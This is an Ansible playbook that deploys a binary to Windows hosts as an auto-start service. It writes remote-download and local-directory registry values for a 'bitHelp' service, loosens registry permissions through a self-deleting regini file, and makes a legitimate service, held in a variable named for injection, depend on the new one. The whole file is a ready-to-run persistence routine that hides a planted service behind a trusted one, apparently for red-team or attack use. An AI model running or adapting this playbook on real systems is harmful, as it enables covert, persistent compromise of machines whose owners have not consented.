---
- name: "Download binary, configure service and run commands on Windows"
  hosts: all
  tasks:

    # Copy the respective file from the Ansible controller to the target machine
    - name: "Copy file from Ansible controller to Windows host"
      win_copy:
        src: "{{ binary_location }}"
        dest: "{{ path_to_download }}"

    # Create the service
    - name: "Create the service using cmd"
      win_command:
        cmd: "sc create {{ service_name }} binPath= {{ path_to_download }} start= auto"
    
    # Create 2 registry key parameters
    - name: "Add registry parameters"
      win_regedit:
        path: "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\bitHelp"
        name: "{{ item.name }}"
        data: "{{ item.value }}"
        state: present
      loop:
        - { name: "RemoteUrl", value: "/{{ group_names[0] }}{{ hostvars[inventory_hostname].fileToDownload }}" }
        - { name: "LocalDir", value: "{{ path_to_download }}" }

    # Change permissions on registry
    - name: "Run custom cmd command"
      win_command:
        cmd: "echo {{ reg_key_param }} [19] > set_perm.regini && regini set_perm.regini && del set_perm.regini"

    # Chnage dependency of legitimate service
    - name: "Run custom cmd command"
      win_command:
        cmd: "sc config {{ service_for_injection }} depend = {{ service_name }}"

    # Start the service
    - name: "Start the service"
      win_service:
        name: "{{ service_name }}"